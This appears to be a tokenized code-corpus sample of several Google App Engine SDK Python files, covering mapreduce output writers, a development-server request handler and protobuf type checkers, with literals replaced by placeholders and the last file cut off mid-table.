[ '<STR_LIT>' ] = '<STR_LIT>' <EOL> self . response . headers [ '<STR_LIT:Content-Type>' ] = self . _RESOURCE_MAP [ relative_path ] <EOL> if relative_path == '<STR_LIT>' : <EOL> self . response . out . write ( <EOL> open ( path ) . read ( ) . replace ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> else : <EOL> self . response . out . write ( open ( path ) . read ( ) ) <EOL> def CreateApplication ( ) : <EOL> """<STR_LIT>""" <EOL> return webapp . WSGIApplication ( [ <EOL> ( r'<STR_LIT>' % ( utils . config . BASE_PATH , <EOL> delete_handler . ConfirmDeleteHandler . SUFFIX ) , <EOL> delete_handler . ConfirmDeleteHandler ) , <EOL> ( r'<STR_LIT>' % ( utils . config . BASE_PATH , <EOL> delete_handler . DoDeleteHandler . SUFFIX ) , <EOL> delete_handler . DoDeleteHandler ) , <EOL> ( r'<STR_LIT>' % ( utils . config . BASE_PATH , <EOL> utils . MapreduceDoneHandler . SUFFIX ) , <EOL> utils . MapreduceDoneHandler ) , <EOL> ] + copy_handler . 
handlers_list ( utils . config . BASE_PATH ) + [ <EOL> ( r'<STR_LIT>' % utils . config . BASE_PATH , StaticResourceHandler ) , <EOL> ( r'<STR_LIT>' , RouteByActionHandler ) , <EOL> ] ) <EOL> APP = CreateApplication ( ) <EOL> def main ( ) : <EOL> util . run_wsgi_app ( APP ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> main ( ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import with_statement <EOL> __all__ = [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ] <EOL> import gc <EOL> import string <EOL> import time <EOL> from google . appengine . api import files <EOL> from google . appengine . api . files import records <EOL> from google . appengine . ext . mapreduce import errors <EOL> from google . appengine . ext . mapreduce import model <EOL> from google . appengine . ext . mapreduce import operation <EOL> COUNTER_IO_WRITE_BYTES = "<STR_LIT>" <EOL> COUNTER_IO_WRITE_MSEC = "<STR_LIT>" <EOL> class OutputWriter ( model . JsonMixin ) : <EOL> """<STR_LIT>""" <EOL> @ classmethod <EOL> def validate ( cls , mapper_spec ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( "<STR_LIT>" % cls ) <EOL> @ classmethod <EOL> def init_job ( cls , mapreduce_state ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( "<STR_LIT>" % cls ) <EOL> @ classmethod <EOL> def finalize_job ( cls , mapreduce_state ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( "<STR_LIT>" % cls ) <EOL> @ classmethod <EOL> def from_json ( cls , state ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( "<STR_LIT>" % cls ) <EOL> def to_json ( self ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( "<STR_LIT>" % <EOL> self . __class__ ) <EOL> @ classmethod <EOL> def create ( cls , mapreduce_state , shard_number ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( "<STR_LIT>" % cls ) <EOL> def write ( self , data , ctx ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( "<STR_LIT>" % <EOL> self . __class__ ) <EOL> def finalize ( self , ctx , shard_number ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( "<STR_LIT>" % <EOL> self . 
__class__ ) <EOL> @ classmethod <EOL> def get_filenames ( cls , mapreduce_state ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( "<STR_LIT>" % <EOL> self . __class__ ) <EOL> _FILES_API_FLUSH_SIZE = <NUM_LIT> * <NUM_LIT> <EOL> _FILES_API_MAX_SIZE = <NUM_LIT:1000> * <NUM_LIT> <EOL> class _FilePool ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , flush_size_chars = _FILES_API_FLUSH_SIZE , ctx = None ) : <EOL> """<STR_LIT>""" <EOL> self . _flush_size = flush_size_chars <EOL> self . _append_buffer = { } <EOL> self . _size = <NUM_LIT:0> <EOL> self . _ctx = ctx <EOL> def __append ( self , filename , data ) : <EOL> """<STR_LIT>""" <EOL> self . _append_buffer [ filename ] = ( <EOL> self . _append_buffer . get ( filename , "<STR_LIT>" ) + data ) <EOL> self . _size += len ( data ) <EOL> def append ( self , filename , data ) : <EOL> """<STR_LIT>""" <EOL> if self . _size + len ( data ) > self . _flush_size : <EOL> self . flush ( ) <EOL> if len ( data ) > _FILES_API_MAX_SIZE : <EOL> raise errors . Error ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" % self . _flush_size ) <EOL> else : <EOL> self . __append ( filename , data ) <EOL> if self . _size > self . _flush_size : <EOL> self . flush ( ) <EOL> def flush ( self ) : <EOL> """<STR_LIT>""" <EOL> start_time = time . time ( ) <EOL> for filename , data in self . _append_buffer . iteritems ( ) : <EOL> with files . open ( filename , "<STR_LIT:a>" ) as f : <EOL> if len ( data ) > self . _flush_size : <EOL> raise "<STR_LIT>" + str ( len ( data ) ) <EOL> if self . _ctx : <EOL> operation . counters . Increment ( <EOL> COUNTER_IO_WRITE_BYTES , len ( data ) ) ( self . _ctx ) <EOL> f . write ( data ) <EOL> if self . _ctx : <EOL> operation . counters . Increment ( <EOL> COUNTER_IO_WRITE_MSEC , <EOL> int ( ( time . time ( ) - start_time ) * <NUM_LIT:1000> ) ) ( self . _ctx ) <EOL> self . _append_buffer = { } <EOL> self . 
_size = <NUM_LIT:0> <EOL> class _StringWriter ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> self . _buffer = "<STR_LIT>" <EOL> def to_string ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _buffer <EOL> def write ( self , data ) : <EOL> """<STR_LIT>""" <EOL> self . _buffer += data <EOL> class RecordsPool ( object ) : <EOL> """<STR_LIT>""" <EOL> _RECORD_OVERHEAD_BYTES = <NUM_LIT:10> <EOL> def __init__ ( self , filename , <EOL> flush_size_chars = _FILES_API_FLUSH_SIZE , <EOL> ctx = None , <EOL> exclusive = False ) : <EOL> """<STR_LIT>""" <EOL> self . _flush_size = flush_size_chars <EOL> self . _buffer = [ ] <EOL> self . _size = <NUM_LIT:0> <EOL> self . _filename = filename <EOL> self . _ctx = ctx <EOL> self . _exclusive = exclusive <EOL> def append ( self , data ) : <EOL> """<STR_LIT>""" <EOL> data_length = len ( data ) <EOL> if self . _size + data_length > self . _flush_size : <EOL> self . flush ( ) <EOL> if not self . _exclusive and data_length > _FILES_API_MAX_SIZE : <EOL> raise errors . Error ( <EOL> "<STR_LIT>" % ( data_length , _FILES_API_MAX_SIZE ) ) <EOL> else : <EOL> self . _buffer . append ( data ) <EOL> self . _size += data_length <EOL> if self . _size > self . _flush_size : <EOL> self . flush ( ) <EOL> def flush ( self ) : <EOL> """<STR_LIT>""" <EOL> buf = _StringWriter ( ) <EOL> with records . RecordsWriter ( buf ) as w : <EOL> for record in self . _buffer : <EOL> w . write ( record ) <EOL> str_buf = buf . to_string ( ) <EOL> if not self . _exclusive and len ( str_buf ) > _FILES_API_MAX_SIZE : <EOL> raise errors . Error ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" % <EOL> ( _FILES_API_MAX_SIZE , len ( str_buf ) ) ) <EOL> start_time = time . time ( ) <EOL> with files . open ( self . _filename , "<STR_LIT:a>" , exclusive_lock = self . _exclusive ) as f : <EOL> f . write ( str_buf ) <EOL> if self . _ctx : <EOL> operation . counters . Increment ( <EOL> COUNTER_IO_WRITE_BYTES , len ( str_buf ) ) ( self . _ctx ) <EOL> if self . 
_ctx : <EOL> operation . counters . Increment ( <EOL> COUNTER_IO_WRITE_MSEC , <EOL> int ( ( time . time ( ) - start_time ) * <NUM_LIT:1000> ) ) ( self . _ctx ) <EOL> self . _buffer = [ ] <EOL> self . _size = <NUM_LIT:0> <EOL> gc . collect ( ) <EOL> def __enter__ ( self ) : <EOL> return self <EOL> def __exit__ ( self , atype , value , traceback ) : <EOL> self . flush ( ) <EOL> def _get_output_sharding ( <EOL> mapreduce_state = None , <EOL> mapper_spec = None ) : <EOL> """<STR_LIT>""" <EOL> if mapper_spec : <EOL> return string . lower ( mapper_spec . params . get ( <EOL> BlobstoreOutputWriterBase . OUTPUT_SHARDING_PARAM , <EOL> BlobstoreOutputWriterBase . OUTPUT_SHARDING_NONE ) ) <EOL> if mapreduce_state : <EOL> mapper_spec = mapreduce_state . mapreduce_spec . mapper <EOL> return _get_output_sharding ( mapper_spec = mapper_spec ) <EOL> raise errors . Error ( "<STR_LIT>" ) <EOL> class BlobstoreOutputWriterBase ( OutputWriter ) : <EOL> """<STR_LIT>""" <EOL> OUTPUT_SHARDING_PARAM = "<STR_LIT>" <EOL> OUTPUT_SHARDING_NONE = "<STR_LIT:none>" <EOL> OUTPUT_SHARDING_INPUT_SHARDS = "<STR_LIT:input>" <EOL> class _State ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , filenames ) : <EOL> self . filenames = filenames <EOL> def to_json ( self ) : <EOL> return { "<STR_LIT>" : self . filenames } <EOL> @ classmethod <EOL> def from_json ( cls , json ) : <EOL> return cls ( json [ "<STR_LIT>" ] ) <EOL> def __init__ ( self , filename ) : <EOL> self . _filename = filename <EOL> @ classmethod <EOL> def validate ( cls , mapper_spec ) : <EOL> """<STR_LIT>""" <EOL> if mapper_spec . output_writer_class ( ) != cls : <EOL> raise errors . BadWriterParamsError ( "<STR_LIT>" ) <EOL> output_sharding = _get_output_sharding ( mapper_spec = mapper_spec ) <EOL> if ( output_sharding != cls . OUTPUT_SHARDING_NONE and <EOL> output_sharding != cls . OUTPUT_SHARDING_INPUT_SHARDS ) : <EOL> raise errors . 
BadWriterParamsError ( <EOL> "<STR_LIT>" % output_sharding ) <EOL> @ classmethod <EOL> def init_job ( cls , mapreduce_state ) : <EOL> """<STR_LIT>""" <EOL> output_sharding = _get_output_sharding ( mapreduce_state = mapreduce_state ) <EOL> mapper_spec = mapreduce_state . mapreduce_spec . mapper <EOL> mime_type = mapper_spec . params . get ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> number_of_files = <NUM_LIT:1> <EOL> if output_sharding == cls . OUTPUT_SHARDING_INPUT_SHARDS : <EOL> mapper_spec = mapreduce_state . mapreduce_spec . mapper <EOL> number_of_files = mapper_spec . shard_count <EOL> filenames = [ ] <EOL> for i in range ( number_of_files ) : <EOL> blob_file_name = ( mapreduce_state . mapreduce_spec . name + <EOL> "<STR_LIT:->" + mapreduce_state . mapreduce_spec . mapreduce_id + <EOL> "<STR_LIT>" ) <EOL> if number_of_files > <NUM_LIT:1> : <EOL> blob_file_name += "<STR_LIT:->" + str ( i ) <EOL> filenames . append ( files . blobstore . create ( <EOL> mime_type = mime_type , <EOL> _blobinfo_uploaded_filename = blob_file_name ) ) <EOL> mapreduce_state . writer_state = cls . _State ( filenames ) . to_json ( ) <EOL> @ classmethod <EOL> def finalize_job ( cls , mapreduce_state ) : <EOL> """<STR_LIT>""" <EOL> state = cls . _State . from_json ( <EOL> mapreduce_state . writer_state ) <EOL> output_sharding = _get_output_sharding ( mapreduce_state = mapreduce_state ) <EOL> finalized_filenames = [ ] <EOL> for filename in state . filenames : <EOL> if output_sharding != cls . OUTPUT_SHARDING_INPUT_SHARDS : <EOL> files . finalize ( filename ) <EOL> finalized_filenames . append ( <EOL> files . blobstore . get_file_name ( <EOL> files . blobstore . get_blob_key ( filename ) ) ) <EOL> state . filenames = finalized_filenames <EOL> mapreduce_state . writer_state = state . 
to_json ( ) <EOL> @ classmethod <EOL> def from_json ( cls , state ) : <EOL> """<STR_LIT>""" <EOL> return cls ( state [ "<STR_LIT:filename>" ] ) <EOL> def to_json ( self ) : <EOL> """<STR_LIT>""" <EOL> return { "<STR_LIT:filename>" : self . _filename } <EOL> @ classmethod <EOL> def create ( cls , mapreduce_state , shard_number ) : <EOL> """<STR_LIT>""" <EOL> file_index = <NUM_LIT:0> <EOL> output_sharding = _get_output_sharding ( mapreduce_state = mapreduce_state ) <EOL> if output_sharding == cls . OUTPUT_SHARDING_INPUT_SHARDS : <EOL> file_index = shard_number <EOL> state = cls . _State . from_json ( <EOL> mapreduce_state . writer_state ) <EOL> return cls ( state . filenames [ file_index ] ) <EOL> def finalize ( self , ctx , shard_number ) : <EOL> """<STR_LIT>""" <EOL> mapreduce_spec = ctx . mapreduce_spec <EOL> output_sharding = _get_output_sharding ( mapper_spec = mapreduce_spec . mapper ) <EOL> if output_sharding == self . OUTPUT_SHARDING_INPUT_SHARDS : <EOL> files . finalize ( self . _filename ) <EOL> @ classmethod <EOL> def get_filenames ( cls , mapreduce_state ) : <EOL> """<STR_LIT>""" <EOL> state = cls . _State . from_json ( <EOL> mapreduce_state . writer_state ) <EOL> return state . filenames <EOL> class BlobstoreOutputWriter ( BlobstoreOutputWriterBase ) : <EOL> """<STR_LIT>""" <EOL> def write ( self , data , ctx ) : <EOL> """<STR_LIT>""" <EOL> if ctx . get_pool ( "<STR_LIT>" ) is None : <EOL> ctx . register_pool ( "<STR_LIT>" , _FilePool ( ctx = ctx ) ) <EOL> ctx . get_pool ( "<STR_LIT>" ) . append ( self . _filename , str ( data ) ) <EOL> class BlobstoreRecordsOutputWriter ( BlobstoreOutputWriterBase ) : <EOL> """<STR_LIT>""" <EOL> @ classmethod <EOL> def validate ( cls , mapper_spec ) : <EOL> """<STR_LIT>""" <EOL> if cls . OUTPUT_SHARDING_PARAM in mapper_spec . params : <EOL> raise errors . BadWriterParamsError ( <EOL> "<STR_LIT>" % cls . __name__ ) <EOL> mapper_spec . params [ cls . OUTPUT_SHARDING_PARAM ] = ( <EOL> cls . 
OUTPUT_SHARDING_INPUT_SHARDS ) <EOL> super ( BlobstoreRecordsOutputWriter , cls ) . validate ( mapper_spec ) <EOL> def write ( self , data , ctx ) : <EOL> """<STR_LIT>""" <EOL> if ctx . get_pool ( "<STR_LIT>" ) is None : <EOL> ctx . register_pool ( "<STR_LIT>" , <EOL> RecordsPool ( self . _filename , ctx = ctx , exclusive = True ) ) <EOL> ctx . get_pool ( "<STR_LIT>" ) . append ( str ( data ) ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import with_statement <EOL> import cStringIO <EOL> from email import feedparser <EOL> import imp <EOL> import logging <EOL> import marshal <EOL> import os <EOL> import sys <EOL> import traceback <EOL> import types <EOL> def HandleRequest ( unused_environ , handler_name , unused_url , post_data , <EOL> unused_error , application_root , python_lib , <EOL> import_hook = None ) : <EOL> """<STR_LIT>""" <EOL> body = cStringIO . StringIO ( ) <EOL> module_name = _FileToModuleName ( handler_name ) <EOL> parent_module , _ , submodule_name = module_name . rpartition ( '<STR_LIT:.>' ) <EOL> parent_module = _GetModuleOrNone ( parent_module ) <EOL> main = None <EOL> if module_name in sys . modules : <EOL> module = sys . modules [ module_name ] <EOL> main = _GetValidMain ( module ) <EOL> if not main : <EOL> module = imp . new_module ( '<STR_LIT:__main__>' ) <EOL> if import_hook is not None : <EOL> module . __loader__ = import_hook <EOL> saved_streams = sys . stdin , sys . stdout <EOL> try : <EOL> sys . modules [ '<STR_LIT:__main__>' ] = module <EOL> module . __dict__ [ '<STR_LIT>' ] = '<STR_LIT:__main__>' <EOL> sys . stdin = post_data <EOL> sys . stdout = body <EOL> if main : <EOL> os . environ [ '<STR_LIT>' ] = module . __file__ <EOL> main ( ) <EOL> else : <EOL> filename = _AbsolutePath ( handler_name , application_root , python_lib ) <EOL> if filename . endswith ( os . sep + '<STR_LIT>' ) : <EOL> module . __path__ = [ os . path . dirname ( filename ) ] <EOL> if import_hook is None : <EOL> code , filename = _LoadModuleCode ( filename ) <EOL> else : <EOL> code = import_hook . get_code ( module_name ) <EOL> if not code : <EOL> return { '<STR_LIT:error>' : <NUM_LIT:2> } <EOL> os . environ [ '<STR_LIT>' ] = filename <EOL> module . __file__ = filename <EOL> try : <EOL> sys . modules [ module_name ] = module <EOL> eval ( code , module . __dict__ ) <EOL> except : <EOL> del sys . 
modules [ module_name ] <EOL> if parent_module and submodule_name in parent_module . __dict__ : <EOL> del parent_module . __dict__ [ submodule_name ] <EOL> raise <EOL> else : <EOL> if parent_module : <EOL> parent_module . __dict__ [ submodule_name ] = module <EOL> return _ParseResponse ( body . getvalue ( ) ) <EOL> except : <EOL> exception = sys . exc_info ( ) <EOL> message = '<STR_LIT>' . join ( traceback . format_exception ( exception [ <NUM_LIT:0> ] , exception [ <NUM_LIT:1> ] , <EOL> exception [ <NUM_LIT:2> ] . tb_next ) ) <EOL> logging . error ( message ) <EOL> return { '<STR_LIT:error>' : <NUM_LIT:1> } <EOL> finally : <EOL> sys . stdin , sys . stdout = saved_streams <EOL> module . __name__ = module_name <EOL> if '<STR_LIT:__main__>' in sys . modules : <EOL> del sys . modules [ '<STR_LIT:__main__>' ] <EOL> def _ParseResponse ( response ) : <EOL> """<STR_LIT>""" <EOL> parser = feedparser . FeedParser ( ) <EOL> parser . _set_headersonly ( ) <EOL> parser . feed ( response ) <EOL> parsed_response = parser . close ( ) <EOL> if '<STR_LIT>' in parsed_response : <EOL> status = int ( parsed_response [ '<STR_LIT>' ] . split ( '<STR_LIT:U+0020>' , <NUM_LIT:1> ) [ <NUM_LIT:0> ] ) <EOL> del parsed_response [ '<STR_LIT>' ] <EOL> else : <EOL> status = <NUM_LIT:200> <EOL> return { '<STR_LIT:body>' : parsed_response . get_payload ( ) , <EOL> '<STR_LIT>' : parsed_response . items ( ) , <EOL> '<STR_LIT>' : status } <EOL> def _ParseHeader ( header ) : <EOL> """<STR_LIT>""" <EOL> key , _ , value = header . partition ( '<STR_LIT::>' ) <EOL> return key . strip ( ) , value . strip ( ) <EOL> def _GetValidMain ( module ) : <EOL> """<STR_LIT>""" <EOL> if not hasattr ( module , '<STR_LIT>' ) : <EOL> return None <EOL> main = module . main <EOL> if not hasattr ( main , '<STR_LIT>' ) : <EOL> return None <EOL> defaults = main . __defaults__ <EOL> if defaults : <EOL> default_argcount = len ( defaults ) <EOL> else : <EOL> default_argcount = <NUM_LIT:0> <EOL> if ( main . __code__ . 
co_argcount - default_argcount ) == <NUM_LIT:0> : <EOL> return main <EOL> else : <EOL> return None <EOL> def _FileToModuleName ( filename ) : <EOL> """<STR_LIT>""" <EOL> _ , lib , suffix = filename . partition ( '<STR_LIT>' ) <EOL> if lib : <EOL> module = suffix <EOL> else : <EOL> module = filename <EOL> module = os . path . normpath ( module ) <EOL> if '<STR_LIT>' in module : <EOL> module = module . rpartition ( '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> module = module . replace ( os . sep , '<STR_LIT:.>' ) <EOL> module = module . strip ( '<STR_LIT:.>' ) <EOL> if module . endswith ( '<STR_LIT>' ) : <EOL> module = module . rpartition ( '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> return module <EOL> def _AbsolutePath ( filename , application_root , python_lib ) : <EOL> """<STR_LIT>""" <EOL> _ , lib , suffix = filename . partition ( '<STR_LIT>' ) <EOL> if lib : <EOL> filename = os . path . join ( python_lib , suffix ) <EOL> else : <EOL> filename = os . path . join ( application_root , filename ) <EOL> if filename . endswith ( os . sep ) or os . path . isdir ( filename ) : <EOL> filename = os . path . join ( filename , '<STR_LIT>' ) <EOL> return filename <EOL> def _LoadModuleCode ( filename ) : <EOL> """<STR_LIT>""" <EOL> compiled_filename = filename + '<STR_LIT:c>' <EOL> if os . path . exists ( compiled_filename ) : <EOL> with open ( compiled_filename , '<STR_LIT:r>' ) as f : <EOL> magic_numbers = f . read ( <NUM_LIT:8> ) <EOL> if len ( magic_numbers ) == <NUM_LIT:8> and magic_numbers [ : <NUM_LIT:4> ] == imp . get_magic ( ) : <EOL> try : <EOL> return _FixCodeFilename ( marshal . load ( f ) , filename ) , compiled_filename <EOL> except ( EOFError , ValueError ) : <EOL> pass <EOL> if os . path . exists ( filename ) : <EOL> with open ( filename , '<STR_LIT:r>' ) as f : <EOL> code = compile ( f . 
read ( ) , filename , '<STR_LIT>' , <NUM_LIT:0> , True ) <EOL> return code , filename <EOL> else : <EOL> return None , filename <EOL> def _FixCodeFilename ( code , filename ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( code , types . CodeType ) : <EOL> code = types . CodeType ( <EOL> code . co_argcount , <EOL> code . co_nlocals , <EOL> code . co_stacksize , <EOL> code . co_flags , <EOL> code . co_code , <EOL> tuple ( [ _FixCodeFilename ( c , filename ) for c in code . co_consts ] ) , <EOL> code . co_names , <EOL> code . co_varnames , <EOL> filename , <EOL> code . co_name , <EOL> code . co_firstlineno , <EOL> code . co_lnotab , <EOL> code . co_freevars , <EOL> code . co_cellvars ) <EOL> return code <EOL> def _GetModuleOrNone ( module_name ) : <EOL> """<STR_LIT>""" <EOL> module = None <EOL> if module_name : <EOL> try : <EOL> module = __import__ ( module_name ) <EOL> except ImportError : <EOL> pass <EOL> else : <EOL> for name in module_name . split ( '<STR_LIT:.>' ) [ <NUM_LIT:1> : ] : <EOL> module = getattr ( module , name ) <EOL> return module </s>
<s> """<STR_LIT>""" <EOL> from google . net . proto2 . python . internal import decoder <EOL> from google . net . proto2 . python . internal import encoder <EOL> from google . net . proto2 . python . internal import wire_format <EOL> from google . net . proto2 . python . public import descriptor <EOL> _FieldDescriptor = descriptor . FieldDescriptor <EOL> def GetTypeChecker ( cpp_type , field_type ) : <EOL> """<STR_LIT>""" <EOL> if ( cpp_type == _FieldDescriptor . CPPTYPE_STRING and <EOL> field_type == _FieldDescriptor . TYPE_STRING ) : <EOL> return UnicodeValueChecker ( ) <EOL> return _VALUE_CHECKERS [ cpp_type ] <EOL> class TypeChecker ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , * acceptable_types ) : <EOL> self . _acceptable_types = acceptable_types <EOL> def CheckValue ( self , proposed_value ) : <EOL> if not isinstance ( proposed_value , self . _acceptable_types ) : <EOL> message = ( '<STR_LIT>' % <EOL> ( proposed_value , type ( proposed_value ) , self . _acceptable_types ) ) <EOL> raise TypeError ( message ) <EOL> class IntValueChecker ( object ) : <EOL> """<STR_LIT>""" <EOL> def CheckValue ( self , proposed_value ) : <EOL> if not isinstance ( proposed_value , ( int , long ) ) : <EOL> message = ( '<STR_LIT>' % <EOL> ( proposed_value , type ( proposed_value ) , ( int , long ) ) ) <EOL> raise TypeError ( message ) <EOL> if not self . _MIN <= proposed_value <= self . 
_MAX : <EOL> raise ValueError ( '<STR_LIT>' % proposed_value ) <EOL> class UnicodeValueChecker ( object ) : <EOL> """<STR_LIT>""" <EOL> def CheckValue ( self , proposed_value ) : <EOL> if not isinstance ( proposed_value , ( str , unicode ) ) : <EOL> message = ( '<STR_LIT>' % <EOL> ( proposed_value , type ( proposed_value ) , ( str , unicode ) ) ) <EOL> raise TypeError ( message ) <EOL> if isinstance ( proposed_value , str ) : <EOL> try : <EOL> unicode ( proposed_value , '<STR_LIT:ascii>' ) <EOL> except UnicodeDecodeError : <EOL> raise ValueError ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % <EOL> ( proposed_value ) ) <EOL> class Int32ValueChecker ( IntValueChecker ) : <EOL> _MIN = - <NUM_LIT> <EOL> _MAX = <NUM_LIT> <EOL> class Uint32ValueChecker ( IntValueChecker ) : <EOL> _MIN = <NUM_LIT:0> <EOL> _MAX = ( <NUM_LIT:1> << <NUM_LIT:32> ) - <NUM_LIT:1> <EOL> class Int64ValueChecker ( IntValueChecker ) : <EOL> _MIN = - ( <NUM_LIT:1> << <NUM_LIT> ) <EOL> _MAX = ( <NUM_LIT:1> << <NUM_LIT> ) - <NUM_LIT:1> <EOL> class Uint64ValueChecker ( IntValueChecker ) : <EOL> _MIN = <NUM_LIT:0> <EOL> _MAX = ( <NUM_LIT:1> << <NUM_LIT:64> ) - <NUM_LIT:1> <EOL> _VALUE_CHECKERS = { <EOL> _FieldDescriptor . CPPTYPE_INT32 : Int32ValueChecker ( ) , <EOL> _FieldDescriptor . CPPTYPE_INT64 : Int64ValueChecker ( ) , <EOL> _FieldDescriptor . CPPTYPE_UINT32 : Uint32ValueChecker ( ) , <EOL> _FieldDescriptor . CPPTYPE_UINT64 : Uint64ValueChecker ( ) , <EOL> _FieldDescriptor . CPPTYPE_DOUBLE : TypeChecker ( <EOL> float , int , long ) , <EOL> _FieldDescriptor . CPPTYPE_FLOAT : TypeChecker ( <EOL> float , int , long ) , <EOL> _FieldDescriptor . CPPTYPE_BOOL : TypeChecker ( bool , int ) , <EOL> _FieldDescriptor . CPPTYPE_ENUM : Int32ValueChecker ( ) , <EOL> _FieldDescriptor . CPPTYPE_STRING : TypeChecker ( str ) , <EOL> } <EOL> TYPE_TO_BYTE_SIZE_FN = { <EOL> _FieldDescriptor . TYPE_DOUBLE : wire_format . DoubleByteSize , <EOL> _FieldDescriptor . TYPE_FLOAT : wire_format . 
FloatByteSize , <EOL> _FieldDescriptor . TYPE_INT64 : wire_format . Int64ByteSize , <EOL> _FieldDescriptor . TYPE_UINT64 : wire_format . UInt64ByteSize , <EOL> _FieldDescriptor . TYPE_INT32 : wire_format . Int32ByteSize , <EOL> _FieldDescriptor . TYPE_FIXED64 : wire_format . Fixed64ByteSize , <EOL> _FieldDescriptor . TYPE_FIXED32 : wire_format . Fixed32ByteSize , <EOL> _FieldDescriptor . TYPE_BOOL : wire_format . BoolByteSize , <EOL> _FieldDescriptor . TYPE_STRING : wire_format . StringByteSize , <EOL> _FieldDescriptor . TYPE_GROUP : wire_format . GroupByteSize , <EOL> _FieldDescriptor . TYPE_MESSAGE : wire_format . MessageByteSize , <EOL> _FieldDescriptor . TYPE_BYTES : wire_format . BytesByteSize , <EOL> _FieldDescriptor . TYPE_UINT32 : wire_format . UInt32ByteSize , <EOL> _FieldDescriptor . TYPE_ENUM : wire_format . EnumByteSize , <EOL> _FieldDescriptor . TYPE_SFIXED32 : wire_format . SFixed32ByteSize , <EOL> _FieldDescriptor . TYPE_SFIXED64 : wire_format . SFixed64ByteSize , <EOL> _FieldDescriptor . TYPE_SINT32 : wire_format . SInt32ByteSize , <EOL> _FieldDescriptor . TYPE_SINT64 : wire_format . SInt64ByteSize <EOL> } <EOL> TYPE_TO_ENCODER = { <EOL> _FieldDescriptor . TYPE_DOUBLE : encoder . DoubleEncoder , <EOL> _FieldDescriptor . TYPE_FLOAT : encoder . FloatEncoder , <EOL> _FieldDescriptor . TYPE_INT64 : encoder . Int64Encoder , <EOL> _FieldDescriptor . TYPE_UINT64 : encoder . UInt64Encoder , <EOL> _FieldDescriptor . TYPE_INT32 : encoder . Int32Encoder , <EOL> _FieldDescriptor . TYPE_FIXED64 : encoder . Fixed64Encoder , <EOL> _FieldDescriptor . TYPE_FIXED32 : encoder . Fixed32Encoder , <EOL> _FieldDescriptor . TYPE_BOOL : encoder . BoolEncoder , <EOL> _FieldDescriptor . TYPE_STRING : encoder . StringEncoder , <EOL> _FieldDescriptor . TYPE_GROUP : encoder . GroupEncoder , <EOL> _FieldDescriptor . TYPE_MESSAGE : encoder . MessageEncoder , <EOL> _FieldDescriptor . TYPE_BYTES : encoder . BytesEncoder , <EOL> _FieldDescriptor . TYPE_UINT32 : encoder . 
UInt32Encoder , <EOL> _FieldDescriptor . TYPE_ENUM : encoder . EnumEncoder , <EOL> _FieldDescriptor . TYPE_SFIXED32 : encoder . SFixed32Encoder , <EOL> _FieldDescriptor . TYPE_SFIXED64 : encoder . SFixed64Encoder , <EOL> _FieldDescriptor . TYPE_SINT32 : encoder . SInt32Encoder , <EOL> _FieldDescriptor . TYPE_SINT64 : encoder . SInt64Encoder , <EOL> } <EOL> TYPE_TO_SIZER = { <EOL> _FieldDescriptor . TYPE_DOUBLE : encoder . DoubleSizer , <EOL> _FieldDescriptor . TYPE_FLOAT : encoder . FloatSizer , <EOL> _FieldDescriptor . TYPE_INT64 : encoder . Int64Sizer , <EOL> _FieldDescriptor . TYPE_UINT64 : encoder . UInt64Sizer , <EOL> _FieldDescriptor . TYPE_INT32 : encoder . Int32Sizer , <EOL> _FieldDescriptor . TYPE_FIXED64 : encoder . Fixed64Sizer , <EOL> _FieldDescriptor . TYPE_FIXED32 : encoder . Fixed32Sizer , <EOL> _FieldDescriptor . TYPE_BOOL : encoder . BoolSizer , <EOL> _FieldDescriptor . TYPE_STRING : encoder . StringSizer , <EOL> _FieldDescriptor . TYPE_GROUP : encoder . GroupSizer , <EOL> _FieldDescriptor . TYPE_MESSAGE : encoder . MessageSizer , <EOL> _FieldDescriptor . TYPE_BYTES : encoder . BytesSizer , <EOL> _FieldDescriptor . TYPE_UINT32 : encoder . UInt32Sizer , <EOL> _FieldDescriptor . TYPE_ENUM : encoder . EnumSizer , <EOL> _FieldDescriptor . TYPE_SFIXED32 : encoder . SFixed32Sizer , <EOL> _FieldDescriptor . TYPE_SFIXED64 : encoder . SFixed64Sizer , <EOL> _FieldDescriptor . TYPE_SINT32 : encoder . SInt32Sizer , <EOL> _FieldDescriptor . TYPE_SINT64 : encoder . SInt64Sizer , <EOL> } <EOL> TYPE_TO_DECODER = { <EOL> _FieldDescriptor . TYPE_DOUBLE : decoder . DoubleDecoder , <EOL> _FieldDescriptor . TYPE_FLOAT : decoder . FloatDecoder , <EOL> _FieldDescriptor . TYPE_INT64 : decoder . Int64Decoder , <EOL> _FieldDescriptor . TYPE_UINT64 : decoder . UInt64Decoder , <EOL> _FieldDescriptor . TYPE_INT32 : decoder . Int32Decoder , <EOL> _FieldDescriptor . TYPE_FIXED64 : decoder . Fixed64Decoder , <EOL> _FieldDescriptor . TYPE_FIXED32 : decoder . 
